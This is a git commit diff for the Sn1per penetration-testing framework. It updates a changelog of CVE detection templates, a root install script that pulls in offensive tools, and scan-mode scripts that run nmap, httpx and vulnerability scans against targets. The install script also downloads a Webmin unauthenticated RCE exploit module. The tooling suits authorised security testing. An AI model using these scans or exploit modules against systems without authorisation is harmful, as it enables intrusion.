mirror of https://github.com/1N3/Sn1per.git
Fixed auto-update code
This commit is contained in:
parent
e85907bb26
commit
dae095c78c
27
CHANGELOG.md
27
CHANGELOG.md
|
|
@ -1,4 +1,31 @@
|
|||
## CHANGELOG:
|
||||
* v8.8 - Added automatic 'flyover' scans of all discovered domains for 'recon' mode
|
||||
* v8.8 - Added static grep searching rules of all URL's and sub-domains (see sniper.conf for details)
|
||||
* v8.8 - Added verbose status logging to flyover mode showing HTTP status/redirect/title, etc.
|
||||
* v8.8 - Added integration for Port Scanner Add-on for Sn1per Professional
|
||||
* v8.8 - Added enhanced scanning of all unique dynamic URL's via InjectX fuzzer
|
||||
* v8.8 - Added CVE-2020-25213 - WP File Manager File Upload sc0pe template
|
||||
* v8.8 - Added cPanel Login Found sc0pe template
|
||||
* v8.8 - Added Wordpress WP-File-Manager Version Detected sc0pe template
|
||||
* v8.8 - Added VMware vCenter Unauthenticated Arbitrary File Read sc0pe template
|
||||
* v8.8 - Added PHP Composer Disclosure sc0pe template
|
||||
* v8.8 - Added Git Config Disclosure sc0pe template
|
||||
* v8.8 - Added updated NMap vulscan DB files
|
||||
* v8.8 - Added CVE-2020-9047 - exacqVision Web Service Remote Code Execution sc0pe template
|
||||
* v8.8 - Removed UDP port scan settings/options and combined with full portscan ports
|
||||
* v8.8 - Added CVE-2019-8442 - Jira Webroot Directory Traversal sc0pe template
|
||||
* v8.8 - Added CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection sc0pe template
|
||||
* v8.8 - Added CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution sc0pe template
|
||||
* v8.8 - Added CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint sc0pe template
|
||||
* v8.8 - Added Smuggler HTTP request smuggling detection
|
||||
* v8.8 - Added CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services sc0pe template
|
||||
* v8.8 - Added CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix sc0pe template
|
||||
* v8.8 - Added Jaspersoft Detected sc0pe template
|
||||
* v8.8 - Added improved dirsearch exclude options to all web file/dir searches
|
||||
* v8.8 - Fixed naming conflict for theharvester
|
||||
* v8.8 - Created backups of all NMap HTML reports for fullportonly scans
|
||||
* v8.8 - Added line limit to GUA URL's displayed in console
|
||||
* v8.7 - Added AvantFAX LOGIN Detected sc0pe template
|
||||
* v8.7 - Updated web file bruteforce lists
|
||||
* v8.7 - Added updated Slack API integration/notifications
|
||||
* v8.7 - Added Arachni, Nikto, Nessus, NMap + 20 passive sc0pe vulnerability parsers
|
||||
|
|
|
|||
100
install.sh
100
install.sh
|
|
@ -30,7 +30,7 @@ if [[ "$1" != "force" ]]; then
|
|||
fi
|
||||
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
echo "This script must be run as root"
|
||||
echo "This script must be run as root"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
|
|
@ -59,18 +59,55 @@ UBUNTU_CHECK=$(egrep DISTRIB_ID /etc/lsb-release 2> /dev/null)
|
|||
if [[ $UBUNTU_CHECK == "DISTRIB_ID=Ubuntu" ]]; then
|
||||
cp /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
|
||||
cp -a /run/user/1000/gdm/Xauthority /root/.Xauthority 2> /dev/null
|
||||
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
|
||||
cp -a /home/user/.Xauthority /root/.Xauthority 2> /dev/null
|
||||
chown root /root/.Xauthority
|
||||
XAUTHORITY=/root/.Xauthority
|
||||
fi
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Installing package dependencies...$RESET"
|
||||
apt-get update
|
||||
for i in adb aha curl cutycapt dnsrecon dos2unix golang greenbone-security-assistant host hydra jq jsbeautifier ldapscripts libssl-dev libxml2-utils nbtscan net-tools nfs-common nikto nmap nodejs openvas p7zip-full phantomjs php7.4 php7.4-curl python python-pip python3-paramiko python3-pip rpcbind ruby rubygems sqlmap sslscan wafw00f whatweb whois xdg-utils xmlstarlet xsltproc; do
|
||||
if [ -z `which $i` ]; then
|
||||
apt install -y $i 2>/dev/null
|
||||
fi
|
||||
done
|
||||
apt-get install -y python3-paramiko
|
||||
apt-get install -y nfs-common
|
||||
apt-get install -y nodejs
|
||||
apt-get install -y wafw00f
|
||||
apt-get install -y xdg-utils
|
||||
apt-get install -y ruby
|
||||
apt-get install -y rubygems
|
||||
apt-get install -y python
|
||||
apt-get install -y dos2unix
|
||||
apt-get install -y aha
|
||||
apt-get install -y libxml2-utils
|
||||
apt-get install -y rpcbind
|
||||
apt-get install -y cutycapt
|
||||
apt-get install -y host
|
||||
apt-get install -y whois
|
||||
apt-get install -y dnsrecon
|
||||
apt-get install -y curl
|
||||
apt-get install -y nmap
|
||||
apt-get install -y php7.4
|
||||
apt-get install -y php7.4-curl
|
||||
apt-get install -y hydra
|
||||
apt-get install -y sqlmap
|
||||
apt-get install -y nbtscan
|
||||
apt-get install -y nikto
|
||||
apt-get install -y whatweb
|
||||
apt-get install -y sslscan
|
||||
apt-get install -y jq
|
||||
apt-get install -y golang
|
||||
apt-get install -y adb
|
||||
apt-get install -y xsltproc
|
||||
apt-get install -y ldapscripts
|
||||
apt-get install -y libssl-dev 2> /dev/null
|
||||
apt-get install -y python-pip
|
||||
apt-get remove -y python3-pip
|
||||
apt-get install -y python3-pip
|
||||
apt-get install -y xmlstarlet
|
||||
apt-get install -y net-tools
|
||||
apt-get install -y p7zip-full
|
||||
apt-get install -y jsbeautifier
|
||||
apt-get install -y phantomjs 2> /dev/null
|
||||
apt-get install -y openvas
|
||||
apt-get install -y greenbone-security-assistant
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Installing Metasploit...$RESET"
|
||||
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall
|
||||
|
|
@ -104,14 +141,14 @@ cd $PLUGINS_DIR
|
|||
mkdir -p $GO_DIR 2> /dev/null
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Downloading extensions...$RESET"
|
||||
git clone https://github.com/1N3/BruteX.git
|
||||
git clone https://github.com/1N3/Findsploit.git
|
||||
git clone https://github.com/1N3/BruteX.git
|
||||
git clone https://github.com/1N3/Findsploit.git
|
||||
git clone https://github.com/1N3/Goohak.git
|
||||
git clone https://github.com/1N3/BlackWidow
|
||||
git clone https://github.com/1N3/Sublist3r.git
|
||||
git clone https://github.com/nccgroup/shocker.git
|
||||
git clone https://github.com/nccgroup/shocker.git
|
||||
git clone https://github.com/BishopFox/spoofcheck.git
|
||||
git clone https://github.com/arthepsy/ssh-audit
|
||||
git clone https://github.com/arthepsy/ssh-audit
|
||||
git clone https://github.com/1N3/jexboss.git
|
||||
git clone https://github.com/maurosoria/dirsearch.git
|
||||
git clone https://github.com/jekyc/wig.git
|
||||
|
|
@ -120,24 +157,24 @@ git clone https://github.com/hisxo/gitGraber.git
|
|||
git clone https://github.com/1N3/LinkFinder
|
||||
git clone https://github.com/christophetd/censys-subdomain-finder.git
|
||||
git clone https://github.com/rbsec/dnscan.git
|
||||
git clone https://github.com/infosec-au/altdns.git
|
||||
git clone https://github.com/infosec-au/altdns.git
|
||||
git clone https://github.com/blechschmidt/massdns.git
|
||||
git clone https://github.com/ProjectAnte/dnsgen
|
||||
git clone https://github.com/scipag/vulscan
|
||||
git clone https://github.com/laramies/metagoofil.git
|
||||
git clone https://github.com/achillean/shodan-python
|
||||
git clone https://github.com/Dionach/CMSmap.git
|
||||
git clone https://github.com/0xsauby/yasuo.git
|
||||
git clone https://github.com/Dionach/CMSmap.git
|
||||
git clone https://github.com/0xsauby/yasuo.git
|
||||
|
||||
cd LinkFinder
|
||||
python setup.py install
|
||||
python setup.py install
|
||||
cd ..
|
||||
pip3 install -r $PLUGINS_DIR/gitGraber/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/censys-subdomain-finder/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
cd altdns
|
||||
pip3 install -r requirements.txt
|
||||
python2 setup.py install
|
||||
pip3 install -r requirements.txt
|
||||
python2 setup.py install
|
||||
pip3 install py-altdns 2> /dev/null
|
||||
cd ..
|
||||
cd massdns
|
||||
|
|
@ -155,6 +192,8 @@ go get github.com/harleo/asnip
|
|||
ln -s ~/go/bin/asnip /usr/bin/asnip 2>/dev/null
|
||||
GO111MODULE=on go get -u -v github.com/lc/gau
|
||||
ln -s /root/go/bin/gau /usr/bin/gau2 2> /dev/null
|
||||
GO111MODULE=auto go get -u -v github.com/projectdiscovery/httpx/cmd/httpx
|
||||
ln -s /root/go/bin/httpx /usr/bin/httpx 2> /dev/null
|
||||
rm -Rf ~/go/src/amass*
|
||||
wget https://github.com/OWASP/Amass/releases/download/v3.5.4/amass_v3.5.4_linux_amd64.zip -O ~/go/src/amass.zip
|
||||
cd ~/go/src/
|
||||
|
|
@ -165,22 +204,31 @@ cp amass /usr/bin/amass -f 2> /dev/null
|
|||
rm -f ~/go/src/amass.zip 2> /dev/null
|
||||
cd ~/go/bin; wget https://github.com/projectdiscovery/subfinder/releases/download/v2.2.4/subfinder-linux-amd64.tar; tar -xvf subfinder-linux-amd64.tar; rm -f subfinder-linux-amd64.tar; mv subfinder-linux-amd64 /usr/local/bin/subfinder
|
||||
cd /usr/share/nmap/scripts/
|
||||
rm -Rf vulscan 2> /dev/null
|
||||
rm -f /usr/share/nmap/scripts/vulners.nse
|
||||
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
|
||||
cd /usr/share/nmap/vulscan/
|
||||
rm -f *.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/cve.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/exploitdb.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/openvas.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/osvdb.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/securityfocus.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/securitytracker.csv
|
||||
wget https://www.computec.ch/projekte/vulscan/download/xforce.csv
|
||||
mkdir -p ~/.msf4/modules/exploits/web
|
||||
wget https://raw.githubusercontent.com/1N3/Exploits/master/defcon_webmin_unauth_rce.rb -O ~/.msf4/modules/exploits/web/defcon_webmin_unauth_rce.rb
|
||||
wget https://github.com/OJ/gobuster/releases/download/v3.0.1/gobuster-linux-amd64.7z -O /tmp/gobuster.7z
|
||||
cd /tmp/
|
||||
7z e gobuster.7z
|
||||
chmod +rx gobuster
|
||||
mv gobuster /usr/bin/gobuster
|
||||
chmod +rx gobuster
|
||||
mv gobuster /usr/bin/gobuster
|
||||
cd $PLUGINS_DIR
|
||||
cd shodan-python
|
||||
cd shodan-python
|
||||
python setup.py install
|
||||
cd ..
|
||||
pip3 install spyse.py
|
||||
pip3 install h8mail 2> /dev/null
|
||||
pip3 install h8mail 2> /dev/null
|
||||
cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install
|
||||
cd $PLUGINS_DIR
|
||||
|
||||
|
|
@ -189,12 +237,12 @@ wget https://github.com/laramies/theHarvester/archive/V3.1.tar.gz
|
|||
tar -zxvf V3.1.tar.gz
|
||||
rm V3.1.tar.gz
|
||||
rm -f /usr/bin/theharvester
|
||||
ln -s /usr/share/sniper/plugins/theHarvester-3.1/theHarvester.py /usr/bin/theharvester
|
||||
ln -s /usr/share/sniper/plugins/theHarvester-3.1/theHarvester.py /usr/bin/theharvester-3.1
|
||||
|
||||
# ARACHNI MANUAL INSTALL
|
||||
wget https://github.com/Arachni/arachni/releases/download/v1.5.1/arachni-1.5.1-0.5.12-linux-x86_64.tar.gz -O /tmp/arachni.tar.gz
|
||||
cd /tmp/
|
||||
tar -zxf arachni.tar.gz
|
||||
tar -zxf arachni.tar.gz
|
||||
rm -f /tmp/arachni.tar.gz 2> /dev/null
|
||||
cd arachni-*
|
||||
mkdir -p /usr/share/arachni 2> /dev/null
|
||||
|
|
@ -216,7 +264,7 @@ cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
|
|||
cd $PLUGINS_DIR/Findsploit/ && bash install.sh 2> /dev/null
|
||||
cd $PLUGINS_DIR/spoofcheck/ && pip3 install -r requirements.txt 2> /dev/null
|
||||
|
||||
cd $INSTALL_DIR
|
||||
cd $INSTALL_DIR
|
||||
mkdir $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
|
||||
mkdir $LOOT_DIR/nmap -p 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -37,6 +37,9 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
echo -e "$RESET"
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
echo "$FILE $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
@ -55,6 +58,7 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
echo "$TARGET" | httpx -ip -cdn -cname -title -content-length -status-code -silent -location -web-server 2> /dev/null
|
||||
|
||||
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
|
|
@ -148,6 +152,8 @@ if [[ "$MODE" = "flyover" ]]; then
|
|||
cat $LOOT_DIR/nmap/ports-$a.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
done
|
||||
rm -f $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
# FULLPORTONLY MODE
|
||||
if [[ "$MODE" = "fullportonly" ]]; then
|
||||
|
||||
if [[ "$REPORT" = "1" ]]; then
|
||||
args="-t $TARGET"
|
||||
if [[ ! -z "$WORKSPACE" ]]; then
|
||||
|
|
@ -18,18 +17,22 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
fi
|
||||
args="$args --noreport -m fullportonly"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
||||
logo
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
|
||||
if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then
|
||||
source /usr/share/sniper/pro/.portscanner.conf
|
||||
fi
|
||||
|
||||
if [[ -z "$PORT" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
|
|
@ -38,12 +41,6 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sU $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml -p $DEFAULT_UDP_PORTS $TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
|
|
@ -52,17 +49,8 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sU $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
|
@ -99,6 +87,28 @@ if [[ "$MODE" = "fullportonly" ]]; then
|
|||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
PORT="80"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
SSL="true"
|
||||
PORT="443"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -15,13 +15,10 @@ else
|
|||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -sU $NMAP_OPTIONS --script=/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
|
|
|
|||
|
|
@ -10,25 +10,25 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2019-51-index?url=*.$TARGET&output=json" | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$WAYBACKMACHINE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$HACKERTARGET" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
gau2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -36,7 +36,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
|
||||
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
|
||||
blackwidow -u http://$TARGET:80 -l 3 -v n
|
||||
cp -f /usr/share/blackwidow/"$TARGET"_80/"$TARGET"_80-*.txt $LOOT_DIR/web/ 2>/dev/null
|
||||
